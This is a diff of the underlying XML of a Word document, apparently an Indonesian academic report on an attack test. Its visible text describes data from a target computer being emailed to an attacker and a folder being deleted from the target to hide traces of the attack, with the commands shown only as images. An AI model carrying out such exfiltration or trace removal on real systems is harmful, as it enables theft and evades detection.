+        </w:rPr>
+        <w:t>dari komputer target yang terhubung dengan internet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yang berhasil dikirimkan akan diterima oleh penyerang seperti yang ditampilkan pada Gamb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>r V-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -40517,13 +40291,13 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> berikut ditampilkan baris perintah untuk megakhiri penyerangan.</w:t>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berikut.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -40551,11 +40325,12 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15957D09" wp14:editId="28333C59">
-            <wp:extent cx="4586630" cy="1732265"/>
-            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
-            <wp:docPr id="75" name="Picture 75"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4168FA20" wp14:editId="5B29C16F">
+            <wp:extent cx="4595495" cy="2483003"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="73" name="Picture 73"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -40575,6 +40350,217 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="4607235" cy="2489346"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="166" w:name="_Toc43425342"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>21</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Berhasil Dikirimkan</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="166"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:ind w:hanging="11"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="167" w:name="_Toc43427737"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pengujian Menghapus Folder</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="167"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Langkah terakhir dari rangkaian penyerangan yang dilakukan adalah dengan menghapus folder chrome dari direktori C: komputer target sehingga tidak meninggalkan jejak penyerangan yang mencurigakan. Pada Gambar IV-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berikut ditampilkan baris perintah untuk megakhiri penyerangan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15957D09" wp14:editId="28333C59">
+            <wp:extent cx="4586630" cy="1732265"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
+            <wp:docPr id="75" name="Picture 75"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4620777" cy="1745162"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -40757,7 +40743,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="169" w:name="_Toc43426571"/>
+      <w:bookmarkStart w:id="169" w:name="_Toc43427738"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -40854,7 +40840,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="170" w:name="_Toc43426572"/>
+      <w:bookmarkStart w:id="170" w:name="_Toc43427739"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -42318,7 +42304,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="174" w:name="_Toc43426573"/>
+      <w:bookmarkStart w:id="174" w:name="_Toc43427740"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -42442,7 +42428,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41"/>
+                    <a:blip r:embed="rId42"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -42575,7 +42561,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="178" w:name="_Toc43426574"/>
+      <w:bookmarkStart w:id="178" w:name="_Toc43427741"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -43741,7 +43727,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="183" w:name="_Toc43426575"/>
+      <w:bookmarkStart w:id="183" w:name="_Toc43427742"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -43777,7 +43763,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="184" w:name="_Toc43426576"/>
+      <w:bookmarkStart w:id="184" w:name="_Toc43427743"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -43897,7 +43883,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="185" w:name="_Toc43426577"/>
+      <w:bookmarkStart w:id="185" w:name="_Toc43427744"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -44045,7 +44031,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="186" w:name="_Toc43426578"/>
+      <w:bookmarkStart w:id="186" w:name="_Toc43427745"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -44120,7 +44106,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="187" w:name="_Toc43426579"/>
+      <w:bookmarkStart w:id="187" w:name="_Toc43427746"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -44766,7 +44752,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="197" w:name="_Toc43426580"/>
+      <w:bookmarkStart w:id="197" w:name="_Toc43427747"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -44783,7 +44769,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="198" w:name="_Toc43426581"/>
+      <w:bookmarkStart w:id="198" w:name="_Toc43427748"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -45524,7 +45510,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="202" w:name="_Toc43426582"/>
+      <w:bookmarkStart w:id="202" w:name="_Toc43427749"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -45781,7 +45767,7 @@
         </w:numPr>
         <w:ind w:left="431" w:hanging="143"/>
       </w:pPr>
-      <w:bookmarkStart w:id="206" w:name="_Toc43426583"/>
+      <w:bookmarkStart w:id="206" w:name="_Toc43427750"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR</w:t>
@@ -46414,7 +46400,6 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId42"/>
       <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
       <w:pgMar w:top="1701" w:right="1701" w:bottom="1701" w:left="2268" w:header="851" w:footer="851" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
@@ -50708,7 +50693,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B258280A-3280-4E42-B3A5-ED3457D50719}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{14247590-3305-4B2B-B5A0-A80961C1E3BA}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
